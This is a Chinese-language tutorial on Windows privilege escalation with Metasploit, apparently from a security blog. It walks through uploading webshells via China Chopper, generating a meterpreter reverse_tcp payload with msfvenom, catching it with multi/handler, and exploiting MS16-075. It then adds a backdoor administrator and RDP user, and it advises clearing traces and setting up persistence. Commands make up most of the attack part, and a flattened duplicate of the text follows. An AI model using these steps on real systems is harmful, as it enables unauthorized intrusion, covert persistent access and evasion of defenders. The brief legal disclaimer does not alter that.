msf提权简单利用
字数 949 2025-08-12 11:34:37

Metasploit Framework (MSF) 提权利用指南

概述

本指南详细介绍了使用Metasploit Framework (MSF)进行提权的基本流程和方法,主要针对Windows系统。通过本教程,您将学习如何从初始访问到最终获取系统管理员权限的完整过程。

准备工作

  1. 目标系统准备

    • 在目标机器上传小马文件
    • 使用中国菜刀连接目标机器
    • 通过菜刀上传大马文件
    • 使用大马生成系统信息文件:systeminfo > C:\www\KingCMS\q.txt
  2. 补丁分析

    • 使用wesng工具进行补丁筛选:python wes.py q.txt -o vuln.csv
  3. MSF环境准备

    • 连接云服务器
    • 下载并安装Metasploit Framework:
      curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
      chmod 755 msfinstall
      ./msfinstall
      

生成并部署Payload

  1. 生成反弹shell的exe文件

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=[攻击机IP] LPORT=5555 -f exe > q.exe
    
    • LHOST: 攻击机IP地址
    • LPORT: 监听端口(示例中使用5555)
  2. 传输payload到目标系统

    • 安装rz/sz命令:yum install lrzsz
    • 下载exe文件到本地:sz q.exe
    • 通过菜刀将q.exe上传到目标Windows服务器

建立监听会话

  1. 启动MSF控制台

    msfconsole
    
  2. 设置监听

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    show options
    set lport 5555
    set lhost 0.0.0.0
    exploit
    
  3. 触发payload

    • 在菜刀中执行上传的q.exe文件
    • 打开虚拟终端执行命令

会话管理

  1. 基本命令
    • getuid: 查看当前用户权限
    • background: 保存当前会话并退出

提权操作

  1. 使用MS16-075漏洞提权

    search ms16-075
    use [模块编号]  # 通常为1
    set payload windows/x64/meterpreter/reverse_tcp
    set session [会话编号]  # 查看之前挂起的会话编号
    set lport 6666  # 更换端口
    set lhost [攻击机IP]
    exploit
    
  2. 提权成功后操作

    • 输入shell进入系统shell
    • 创建新用户:
      net user username password /add
      
    • 将用户添加到远程桌面组:
      net localgroup "Remote Desktop Users" username /add
      
    • 将用户提升为管理员:
      net localgroup Administrators username /add
      
  3. 远程访问

    • 使用新创建的用户凭据通过远程桌面连接目标系统

注意事项

  1. 法律合规

    • 本技术仅用于合法授权测试
    • 未经授权对系统进行渗透测试是违法行为
  2. 技术要点

    • 确保payload与目标系统架构匹配(32位/64位)
    • 监听端口应选择不常用的端口以避免冲突
    • 提权漏洞选择应根据目标系统补丁情况决定
  3. 后续操作

    • 建议清除痕迹,删除上传的文件
    • 对于长期访问,建议建立持久化后门

通过以上步骤,您应该能够成功利用MSF对目标Windows系统进行提权操作。请记住,这些技术应仅用于合法的安全测试和防御目的。

Metasploit Framework (MSF) 提权利用指南 概述 本指南详细介绍了使用Metasploit Framework (MSF)进行提权的基本流程和方法,主要针对Windows系统。通过本教程,您将学习如何从初始访问到最终获取系统管理员权限的完整过程。 准备工作 目标系统准备 : 在目标机器上传小马文件 使用中国菜刀连接目标机器 通过菜刀上传大马文件 使用大马生成系统信息文件: systeminfo > C:\www\KingCMS\q.txt 补丁分析 : 使用wesng工具进行补丁筛选: python wes.py q.txt -o vuln.csv MSF环境准备 : 连接云服务器 下载并安装Metasploit Framework: 生成并部署Payload 生成反弹shell的exe文件 : LHOST : 攻击机IP地址 LPORT : 监听端口(示例中使用5555) 传输payload到目标系统 : 安装rz/sz命令: yum install lrzsz 下载exe文件到本地: sz q.exe 通过菜刀将q.exe上传到目标Windows服务器 建立监听会话 启动MSF控制台 : 设置监听 : 触发payload : 在菜刀中执行上传的q.exe文件 打开虚拟终端执行命令 会话管理 基本命令 : getuid : 查看当前用户权限 background : 保存当前会话并退出 提权操作 使用MS16-075漏洞提权 : 提权成功后操作 : 输入 shell 进入系统shell 创建新用户: 将用户添加到远程桌面组: 将用户提升为管理员: 远程访问 : 使用新创建的用户凭据通过远程桌面连接目标系统 注意事项 法律合规 : 本技术仅用于合法授权测试 未经授权对系统进行渗透测试是违法行为 技术要点 : 确保payload与目标系统架构匹配(32位/64位) 监听端口应选择不常用的端口以避免冲突 提权漏洞选择应根据目标系统补丁情况决定 后续操作 : 建议清除痕迹,删除上传的文件 对于长期访问,建议建立持久化后门 通过以上步骤,您应该能够成功利用MSF对目标Windows系统进行提权操作。请记住,这些技术应仅用于合法的安全测试和防御目的。